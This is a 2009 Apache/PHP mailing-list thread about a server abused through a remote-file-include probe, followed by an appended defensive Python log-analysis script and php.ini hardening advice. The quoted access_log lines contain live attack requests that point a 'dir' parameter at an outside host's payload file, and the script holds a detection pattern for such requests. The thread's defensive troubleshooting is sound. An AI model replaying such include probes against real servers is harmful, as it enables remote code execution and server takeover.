[ale] Apache PHP redirect proxy type hack

Brian Whigham oobx at itmonger.com
Mon Jun 29 17:37:22 EDT 2009


members.php isn't.  But, it would appear that webpage.php is (as it returned
200).  Who owns webpage.php?  How did the page get there?  Have you tried
the exact same request?  It should probably be removed or debugged.

- You could block by IP or range
- remove webpage.php
- disallow php includes (I forget the php.ini directive)

On Mon, Jun 29, 2009 at 4:40 PM, Ben Alexander <ben-ale at bensbox.com> wrote:

> Every now and then some IP address from Asia or other place hits our web
> server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
> themselves to another website perhaps and use a lot of bandwidth, but only
> our outgoing it seems.
>
> Here is an example from access_log of this (members.php is not a valid PHP
> page on the site):
>
> 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
> 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET /webpage.php//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
>
> When this happens, there are hundreds of megs of log lines like this in
> error_log:
>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:  virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to include 'footer.php' - error finding URI in /htdocs/website.com/webpage.php on line 93
>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request exceeded the limit of 10 subrequest nesting levels due to probable confguration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
>
>
> Any idea how to prevent this?
>
> Thanks,
> Ben
>
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://mail.ale.org/mailman/listinfo/ale
>
>
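As an added illustration (not code from either poster), here is a small access_log triage script for the pattern discussed in this thread: a query parameter carrying a remote URL (the `dir=http://...` remote-include probe), a script name used as a path component (`/webpage.php//members.php`), and the per-client egress byte count that shows up as the "only our outgoing" bandwidth spike. The sample log lines are constructed to match the two requests Ben quoted, plus one ordinary request from 192.0.2.10 (a documentation address) for contrast; the thresholds and function names are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample modelled on the requests quoted in the thread (same client,
# paths, status codes and byte counts); the third line is a benign control request.
SAMPLE_LOG = """\
80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET /webpage.php//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
192.0.2.10 - - [27/Jun/2009:01:36:02 -0400] "GET /webpage.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "-"
"""

# Apache combined-format prefix: client, identd, user, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Parameter values that name a remote resource; a PHP include of such a value is
# exactly what allow_url_include=Off in php.ini is meant to refuse.
URL_SCHEME_RE = re.compile(r'^(https?|ftp|php|data)://', re.IGNORECASE)


def parse_line(line):
    """Parse one access_log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['bytes'] = 0 if rec['bytes'] == '-' else int(rec['bytes'])
    return rec


def rfi_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    _path, _, query = target.partition('?')
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if URL_SCHEME_RE.match(v)]


def classify(rec):
    """Return the list of reasons a request looks like the include/proxy probe."""
    reasons = []
    path, _, _query = rec['target'].partition('?')
    if rfi_params(rec['target']):
        reasons.append('remote URL in query parameter')
    if re.search(r'\.php/', path):
        reasons.append('script name used as a path component (PATH_INFO)')
    if '//' in path:
        reasons.append('doubled slash in path')
    return reasons


def analyze(log_text):
    """Aggregate request count, bytes sent and flagged requests per client IP."""
    per_ip = defaultdict(lambda: {'requests': 0, 'bytes': 0, 'flagged': 0, 'reasons': set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec['ip']]
        stats['requests'] += 1
        stats['bytes'] += rec['bytes']
        reasons = classify(rec)
        if reasons:
            stats['flagged'] += 1
            stats['reasons'].update(reasons)
    return dict(per_ip)


def suspicious_ips(stats, min_flagged=1, min_bytes=100 * 1024 * 1024):
    """Clients worth blocking: any flagged request, or an unusually large egress volume."""
    return sorted(ip for ip, s in stats.items()
                  if s['flagged'] >= min_flagged or s['bytes'] >= min_bytes)


if __name__ == '__main__':
    stats = analyze(SAMPLE_LOG)
    for ip in suspicious_ips(stats):
        s = stats[ip]
        print(f"{ip}: {s['flagged']}/{s['requests']} flagged, {s['bytes']} bytes sent; "
              f"reasons: {', '.join(sorted(s['reasons']))}")
```

Run against the real access_log (`analyze(open('/var/log/httpd/access_log').read())`), the output is the list of clients to feed into the IP/range block that Brian suggests. On the PHP side, the php.ini directives that stop a `dir=http://...` style include from fetching a remote file are `allow_url_include = Off` (and, more broadly, `allow_url_fopen = Off`); neither is on the page, but both are standard PHP settings.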